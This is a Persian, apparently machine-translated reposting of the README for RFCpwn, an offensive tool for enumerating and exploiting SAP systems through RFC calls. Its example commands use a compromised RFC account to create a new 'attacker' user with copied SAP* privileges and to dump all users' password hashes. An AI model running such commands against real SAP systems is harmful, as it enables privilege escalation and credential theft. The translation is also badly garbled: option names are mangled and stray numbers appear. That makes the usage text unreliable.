🐞 RFCpwn – مجموعه ای از ابزارها برای لیست و بهره برداری با استفاده از تماس های RFC برای SAP – مجموعه امنیت اطلاعات

جعبه ابزار برای شمارش و بهره برداری SAP با استفاده از تماس های SAP RFC

این یک ابزار برای نشان دادن تأثیر حسابهای سرویس هک شده است.

این PoC برای استفاده در محیط های تولید در نظر گرفته نشده است.

RFCpwn از pirfc و كتابخانه هاي ارائه شده توسط SAP در اين آدرس استفاده مي كند: https://github.com/SAP/PyRFC#installation موفق19659005 022 استفاده: RFCpwn.py [-h] [-debug] [-ip IP] [-u Username] [-p Password]
[-c Client] [-s Sysid] [-ping] [-enum] [-usercopy]
[-user USER] [-copy COPY] [-pw PW] [-dump] [-exp]

شمارش سبک Impacket و ابزار بهره برداری با استفاده از تماس های SAP RFC

آرگومان های اختیاری:
  -h ، – راهنما این پیام راهنما را نشان داده و از آن خارج شوید
  خروجی DEBUG را روشن کنید

احراز هویت:
  -ip IP
  نام کاربری RFC کاربران نام کاربری RFC
  -P رمز عبور رمز عبور کاربران RFC
  -c مشتری مشتری- eg.000
  – شماره سیستم Sysid- به عنوان مثال 00
  فرمان پینگ RFC

سوء استفاده کاربر:
  -enum برای شمارش یک کاربر خاص از آن استفاده کنید
  تمرین اضافه کردن یک کاربر گفتگو
  -UUSER USER برای مشخص کردن کاربر برای -usercopy و -userenum لازم است
  کپی COPY کاربر برای کپی کردن موردنیاز برای انجام عمل جراحی
  رمزعبور PW رمزعبور کاربر جدید برای تمرین

مجموعه هاش:
  استفاده از زباله های کمپرسی Dump را با موارد زیر استفاده کنید
  -ارزان EXPERIMENTAL – زباله های واژگون BodeE / PASS CodeE

نمونه

پینگ – اتصال را تأیید کنید

 ./ RFCpwn.py -ip 192.168.200.253 -s 00 -c 000 -u RFCUser -p RFCPass -ping 

حقوق کاربر را در گفتگوی کاربر جدید کپی کنید. اگر – کپی مشخص نشده است ، از SAP * استفاده می شود.

 ./ RFCpwn.py -ip 192.168.200.253 -s 00 -c 000 -u RFCUser -p RFCPass - usercopy -user مهاجم -pw changeme1 

زباله واضح همه کاربران. – گزینه ای برای رمزهای آزمایشی کد رمزگذاری و رمز عبور.

 ./ RFCpwn.py -ip 192.168.200.253 -s 00 -c 000 -u RFCUser -p RFCPass -dump 

Demo

بارگیری RFCpwn

¯ _ (ツ) _ / ¯

توجه: اطلاعات مربوط به تحقیق ، آموزش یا او دیتا استفاده خودخواهانه براساس قوانین فدراسیون روسیه قابل مجازات است.